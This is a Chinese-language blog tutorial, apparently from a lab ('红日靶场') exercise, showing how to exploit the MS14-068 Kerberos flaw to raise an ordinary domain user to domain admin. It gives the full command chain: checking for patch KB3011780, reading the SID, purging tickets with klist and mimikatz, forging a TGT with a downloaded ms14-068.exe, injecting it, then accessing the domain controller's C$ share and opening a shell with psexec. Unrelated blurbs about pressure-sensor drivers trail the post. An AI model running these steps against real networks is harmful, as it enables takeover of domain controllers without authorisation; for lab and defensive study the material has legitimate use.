内网渗透---ms14068

news/2024/12/3 4:02:01/

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档

文章目录

  • 前言
  • 一、MS14-068的利用条件?
  • 二、利用步骤
    • 1.查看服务器是否打补丁
    • 2.获取用户的sid值
    • 3.删除系统票据
    • 4.生成票据
    • 5.导入票据
    • 6.提权利用
  • 总结


前言

ms14-068漏洞主要通过伪造域管的TGT,将普通用户权限提权为域管权限,以此来控制域控。只要服务器未打ms14-068补丁(KB3011780),在server 2000以上的域控服务器中,都可进行利用。


一、MS14-068的利用条件?

1、获取域普通用户的账号密码
2、获取域普通用户的sid
3、服务器未打KB3011780补丁
关于防火墙问题,在红日靶场中,未关闭域控的防火墙仍可进行利用。

二、利用步骤

本次主要使用红日靶场,为了方便,直接在win7机器中运行脚本进行展示。
win2008 域控 192.168.52.138
win2007 域机器 192.168.52.143

1.查看服务器是否打补丁

命令行输入systeminfo,查看,发下未打补丁,可以利用
在这里插入图片描述

2.获取用户的sid值

本次使用的域用户为liumei,使用whoami /all 查询sid
在这里插入图片描述
注意sid需要输入正确,因为无法复制,输入错了sid,导致最后导入票据仍失败访问域控。

3.删除系统票据

klist purge/mimikatz里面输入kerberos::purge(因为本机使用klist purge删除后在mimikatz里面查询发下仍存在票据,所以最后两个地方都进行了删除)
klist purge
在这里插入图片描述
kerberos::purge(需要管理员身份运行,再提权后进行删除)
在这里插入图片描述
之前使用红日靶场自带的liukaifeng01账号进行的测试,为了能成功运行mimikatz,所以本地设置liukaifeng01为本地管理员用户,查询此账号不是域管账号,但以管理员运行后dir可直接读到域控信息。所以最后创建了liumei账号进行的测试。

4.生成票据

直接github下载ms14-068.exe软件进行的测试(下载地址:https://github.com/ianxtianxt/MS14-068)
输入命令
ms14-068.exe -u liumei@god.org -p password -s S-1-5-21-2952760202-1353902439-2381784089-1108 -d owa.god.org
-d 参数为域控+域名称
在这里插入图片描述
发现目录下生成TGT_liumei@god.org.ccache

5.导入票据

kerberos::ptc TGT_liumei@god.org.ccache
在这里插入图片描述

6.提权利用

导入票据后,可重新以管理员身份打开cmd命令行(导入票据前以管理员身份运行执行dir命令显示拒绝访问),但是需要注意的是,提权后也需要以管理员运行cmd再利用,不然仍提示拒绝访问。
klist查询发现成功导入
在这里插入图片描述

执行dir \owa\c$
在这里插入图片描述
使用psexec执行域控命令
psexec64.exe \\owa cmd
在这里插入图片描述
执行ipconfig,发现显示域控的ip,利用成功。


总结

以上就是今天要讲的内容,本文仅仅简单介绍了ms14-068的使用,而域控提权仍存在很多利用方式,以后慢慢学习吧。


http://www.ppmy.cn/news/688132.html

相关文章

MS5607 气压计调试记录

MS5607气压计调试过程记录 采用 SPI通讯方式驱动MS5607,主控用的是STM32F777 程序是利用STM32CUBEMX生成的 驱动 根据芯片手册和一些参考资料自己写的,数据暂时看是没问题的。 没有测试环境 没有系统测试过,数值验证没问题。 1,上…

MS5182N(AD7682)驱动开发调试总结(二)

前言 上一篇 文章 主要介绍了对该ADC芯片的三种读写操作模式的时序解读。 接下来介绍一下对寄存器的操作。 寄存器介绍 寄存器总览: 输入配置: 从上图可以看到,是一个14bit长度的寄存器。 相关配置部分代码 #define MS5182N_RB (1) //0: 数据结束是回读当前配置 | 1: …

气压计MS5611编程操作流程

文章更新版本时间备注修订人V0.1发布于 2019-09-21 11:03:46初始版本libo 文章目录 一、开发笔记二、初始化与工作流程 1. 从PROM读取出厂校准值2. 启动温度AD转换,读取AD值3. 启动气压AD转换,读取AD值4. 计算真实气压和温度值5. 计算海拔值 ESPlane 项目…

计算机ms一级分数分配,计算机一级六大MS题型介绍

计算机一级MS考试同学没必要太紧张,做题之前可以深呼吸,要相信自己一定能考过,给自己一些心里暗示,如心里默念:我能行,考试很简单,考不过也没关系,尽力就好!不要给自己压力,把它当做平时的一次普通练习。下面是计算机一级六大MS题型介绍,希望对大家有帮助。 1、选择…

【笔记】MS5837-30BA压力传感器调试笔记

文章目录 一、MS5837-30BA相关介绍1.技术参数2.典型应用电路3.PROM中的标定参数 二、MS5837-30BA数据解算1.解算流程图2.初始化读取标定参数并进行CRC校验①MS5837复位②MS5837 CRC4-bit 校验官方示例③MS5837初始化 读取标定参数 3.标定参数软件补偿并解算数据①MS5837压力参数…

lammps输出的模型导入MS

对于lammps处理后的结果,有时需要使用material studio进一步处理。这就需要将lammps输出的data格式文件转换为material studio可识别的pbd格式文件。 一、lammps2pbd的perl脚本 下载地址:ch2lmp lammpshttps://c4science.ch/source/lammps/browse/lamm…

外设驱动库开发笔记45:MS4515DO压力传感器驱动

很多时候我们需要检测流量和压力这些参数,比如我们要检测大气压,或者通过测量差压来获得输送流体的流量等,都需要用到压力传感器。这一篇我们就来讨论MS4515DO压力传感器的数据获取。 1、功能概述 MS4515DO是TE公司推出的一款基于PCB安装的小…

不使用microscale库从siwarex ms读重量值

西门子称重模块Siwarex MS,使用起来还是比较稳定的,价格也不便宜。西门子提供Microscale库,使200PLC与模块通信,其最新版本是V20,与新版本MS(E-Stand:03)配合可以使用更多命令。这个…